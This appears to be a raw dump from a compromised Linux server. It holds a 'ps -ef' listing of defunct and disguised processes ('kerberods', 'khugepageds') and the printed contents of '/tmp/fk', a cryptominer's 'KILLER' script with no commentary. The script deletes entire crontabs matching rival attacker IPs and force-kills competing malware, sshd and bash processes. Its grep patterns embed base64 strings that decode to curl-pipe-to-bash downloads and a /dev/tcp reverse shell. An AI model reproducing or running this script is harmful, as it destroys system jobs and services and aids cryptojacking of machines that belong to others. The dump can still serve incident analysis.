usr1 27814 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 28307 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 28310 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 28551 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 28557 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 28991 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29056 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 29071 1 0 Apr24 ? 00:00:00 [ps] <defunct>
usr1 29072 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 29073 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 29074 1 0 Apr24 ? 00:00:00 [awk] <defunct>
usr1 29075 1 0 Apr24 ? 00:00:00 [xargs] <defunct>
usr1 29130 1 0 Apr19 ? 00:00:00 [ps] <defunct>
usr1 29131 1 0 Apr19 ? 00:00:00 [grep] <defunct>
usr1 29132 1 0 Apr19 ? 00:00:00 [grep] <defunct>
usr1 29133 1 0 Apr19 ? 00:00:00 [grep] <defunct>
usr1 29134 1 0 Apr19 ? 00:00:00 [awk] <defunct>
usr1 29135 1 0 Apr19 ? 00:00:00 [xargs] <defunct>
usr1 29345 1 0 Apr19 ? 00:00:00 [0] <defunct>
usr1 29347 1 0 Apr19 ? 00:00:05 [0] <defunct>
usr1 29356 1 0 Apr19 ? 00:00:00 [kerberods] <defunct>
usr1 29362 1 0 Apr19 ? 00:20:32 [kerberods] <defunct>
usr1 29411 1 78 Apr19 ? 7-11:37:01 [khugepageds] <defunct>
usr1 29696 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 29700 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 29724 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29727 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29730 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29860 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30084 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30231 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 30252 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 30508 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 30514 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30516 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 30518 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30521 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30571 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 31060 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 31171 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 31274 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 31277 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 31325 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 31581 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 31878 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 31997 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 32124 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 32364 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 32370 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32373 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32376 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32456 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 32507 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32621 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 33114 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33117 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33120 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33318 1 0 Apr19 ? 00:00:51 [khugepageds] <defunct>
usr1 33476 1 0 Apr25 ? 00:00:00 [curl] <defunct>
usr1 33498 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33501 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33504 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33882 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33885 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33888 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34190 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34194 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 34210 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34213 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34216 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34346 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34731 1 0 Apr19 ? 00:00:00 [0] <defunct>
usr1 34734 1 0 Apr19 ? 00:00:14 /usr/sbin/atd
usr1 34752 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 34885 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34888 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34891 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35072 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 35175 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 35248 1 0 Apr25 ? 00:00:00 [curl] <defunct>
usr1 35255 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35258 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35261 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35328 1 0 Apr19 ? 01:48:49 [dblaunchs] <defunct>
usr1 35627 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35630 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35633 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35746 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35772 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35775 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36171 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36174 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36417 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 36573 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36576 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36579 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 37143 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37146 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37149 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37474 1 0 Apr26 ? 00:00:00 [rm] <defunct>
usr1 37486 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37489 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37815 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 37859 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37862 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37865 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37980 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 38235 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 38238 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 38241 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 38596 1 0 Apr26 ? 00:00:00 [curl] <defunct>
usr1 38699 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 39063 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39066 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39113 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 39174 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 39445 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 39901 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39904 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39907 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40037 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 40038 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40237 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40240 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40243 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40463 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 40487 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 40600 1 0 Apr26 ? 00:00:00 [curl] <defunct>
usr1 40638 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 40640 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40643 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40646 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40753 1 0 Apr19 ? 00:00:12 [khugepageds] <defunct>
usr1 40777 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40936 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40939 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40942 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41043 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 41046 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41060 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41063 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41066 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41191 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 41197 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41358 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41361 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41364 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41472 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41861 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41864 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41867 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42189 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 42600 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42969 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42972 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42975 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43105 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43215 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 43265 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43268 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43634 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43637 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44003 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44006 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44009 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44183 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 44334 1 0 Apr27 ? 00:00:00 [xargs] <defunct>
usr1 44340 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44343 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44346 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44470 1 0 Apr27 ? 00:00:00 [ps] <defunct>
usr1 44471 1 0 Apr27 ? 00:00:00 [sort] <defunct>
usr1 44472 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 44473 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 44474 1 0 Apr27 ? 00:00:00 [tail] <defunct>
usr1 44475 1 0 Apr27 ? 00:00:00 [awk] <defunct>
usr1 44476 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45433 1 0 Apr27 ? 00:00:00 [sleep] <defunct>
usr1 45435 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45525 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 45550 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 45722 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 45732 1 0 Apr27 ? 00:00:00 [ps] <defunct>
usr1 45733 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 45734 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 45735 1 0 Apr27 ? 00:00:00 [awk] <defunct>
usr1 45736 1 0 Apr27 ? 00:00:00 [xargs] <defunct>
usr1 45743 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45746 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45749 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 46096 1 0 Apr27 ? 00:00:00 26d60ac947903dfcde79ac551c2ce777b
usr1 46097 1 0 Apr27 ? 00:00:00 [sleep] <defunct>
usr1 46098 46096 99 Apr27 ? 8-09:52:44
usr1 46115 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 46484 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46487 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46864 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46867 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46870 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46988 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46998 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47001 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47004 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47134 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47293 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47296 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47299 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47639 1 0 Apr28 ? 00:00:00 [whoami] <defunct>
usr1 47645 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48014 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48065 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 48071 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 48507 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 48758 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48761 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48764 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48771 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 49068 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 49070 1 0 Apr19 ? 00:00:01 [khugepageds] <defunct>
usr1 49130 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 49251 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 49500 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 49503 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 50251 1 0 01:38 ? 00:00:00 [sh] <defunct>
usr1 50703 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 50869 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 50991 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 50994 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 50997 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 51121 1 0 05:26 ? 00:00:00 [ps] <defunct>
usr1 51122 1 0 05:26 ? 00:00:00 [sort] <defunct>
usr1 51123 1 0 05:26 ? 00:00:00 [grep] <defunct>
usr1 51124 1 0 05:26 ? 00:00:00 [grep] <defunct>
usr1 51125 1 0 05:26 ? 00:00:00 [tail] <defunct>
usr1 51126 1 0 05:26 ? 00:00:00 [awk] <defunct>
usr1 51127 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 51286 1 0 06:32 ? 00:00:00 [sh] <defunct>
usr1 51289 1 0 06:32 ? 00:00:00 [sh] <defunct>
usr1 51292 1 0 06:32 ? 00:00:00 [sh] <defunct>
usr1 51576 1 0 06:32 ? 00:00:00 [ps] <defunct>
usr1 51577 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51578 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51579 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51580 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51581 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51582 1 0 06:32 ? 00:00:00 [awk] <defunct>
usr1 51583 1 0 06:32 ? 00:00:00 [sed] <defunct>
usr1 51584 1 0 06:32 ? 00:00:00 [xargs] <defunct>
usr1 51619 1 0 07:34 ? 00:00:00 ps -ef
usr1 51772 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 52537 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 53040 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 53585 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 53918 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 54081 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 55233 1 0 Apr13 ? 00:00:00 [kerberods] <defunct>
usr1 55238 1 0 Apr13 ? 00:02:24 [kerberods] <defunct>
usr1 55277 1 2 Apr13 ? 08:42:53 [khugepageds] <defunct>
usr1 55495 1 0 Apr14 ? 00:00:00 [kerberods] <defunct>
usr1 55500 1 0 Apr14 ? 00:13:45 [kerberods] <defunct>
usr1 55540 1 29 Apr14 ? 4-12:34:51 [khugepageds] <defunct>
usr1 56634 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 56800 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 56816 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 58259 1 0 Apr19 ? 00:00:06 [khugepageds] <defunct>
usr1 61065 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 61089 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 61970 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 62134 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 62246 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 62517 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 64376 1 0 Apr15 ? 00:00:00 [kerberods] <defunct>
usr1 64381 1 0 Apr15 ? 00:26:39 [kerberods] <defunct>
usr1 64430 1 99 Apr15 ? 24-19:52:10 [khugepageds] <defunct>
usr1 65101 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 65164 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 65442 1 0 Apr19 ? 00:00:47 [khugepageds] <defunct>
fk_bot
cat /tmp/fk
#!/bin/sh
KILLER() {
crontab -l | grep '192.99.142.226\|82.146.58.234\|83.220.169.247\|91.201.42.5' | crontab -r
crontab -l | grep 'pastebin.com' | crontab -r
crontab -l | grep 'gitee.com' | crontab -r
crontab -l | grep '107.174.47.156' | crontab -r
crontab -l | grep '83.220.169.24' | crontab -r
crontab -l | grep '51.38.203.146' | crontab -r
crontab -l | grep 'mr.sh' | crontab -r
crontab -l | grep '2mr.sh' | crontab -r
crontab -l | grep 'cr5.sh' | crontab -r
crontab -l | grep 'logo9.jpg' | crontab -r
ps aux | grep '192.99.142.226\|82.146.58.234\|83.220.169.247\|51.68.173.240\|91.201.42.5' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kworkerdssx -c\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/65ccEJ7\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/jmxx\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/2Ne80nA\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '45.76.122.92'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '51.38.191.178'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '51.15.56.161'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '86s.jpg'| awk '{print $2}' | xargs kill -9
#ps aux | grep -v grep | grep 'pastebin.com'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'aGTSGJJp'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'nMrfmnRa'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'PuNY5tm2'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'I0r8Jyyt'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'AgdgACUD'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'uiZvwxG8'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'hahwNEdB'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'BtwXn5qH'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '3XEzey2T'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 't2tKrCSZ'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'HD7fcBgg'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'zXcDajSs'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '3lmigMo'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'AkMK4A2'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'AJ2AkKe'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'HiPxCJRS'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC030'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC031'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC032'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC033'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep "C4iLM4L"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'aziplcr72qjhzvin'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs kill -9
ps aux | grep -v grep | grep '/boot/vmlinuz'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep "i4b503a52cc5"| awk '{print $2}'|xargs kill -9
ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2"| awk '{print $2}'|xargs kill -9
ps aux | grep -v grep | grep "2g0uv7npuhrlatd"| awk '{print $2}'|xargs kill -9
ps aux | grep -v grep | grep "nqscheduler"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "rkebbwgqpl4npmm"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "]"| awk '$3>10.0{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "0kwti6ut420t"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs kill -9
ps aux | grep -v grep | grep "\[^" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "rsync" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs kill -9
#ps aux | grep -v grep | grep " \["|grep watchbog| awk '{print $2}'| xargs kill -9
#ps aux | grep -v grep | grep " \["|grep bash| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "158.69.133.18:8220"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'gitee.com'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep '104.248.4.162'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '89.35.39.78'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '104.248.53.213'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/dev/shm/z3.sh'| awk '{print $2}' | xargs kill -9
#ps aux | grep -v grep | grep '/bin/bash'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep '\['|grep 'conflue'| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'netdns' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd |awk '$3>10.0{print $2}' | xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "\-bash"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v bin| grep sshd| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux | grep " ps"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "x]"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "x]"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "sh] <"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux |grep " \[]"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep '/tmp/l.sh'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kblockd' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'khugepageds' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'kerberods' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kpsmouseds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kintegrityds' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'thyrsi.com'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'z9ls.com' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'curl'| grep 'max-time'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kthrotld' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'hahwNEdB'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'CnzFVPLF'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'CvKzzZLs'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'aziplcr72qjhzvin'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/udevd'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'YmFzaCAtaSA+JiAvZGV2L3RjcC80NS43Ni4xOTEuMTExLzIwMTIgMD4mMQ'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'dog2.6'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'sustse'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'sustse3'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'mr.sh'| grep 'wget'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'mr.sh'| grep 'curl'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '2mr.sh'| grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '2mr.sh'| grep 'curl' | awk '{print $2}' | xargs kill -9
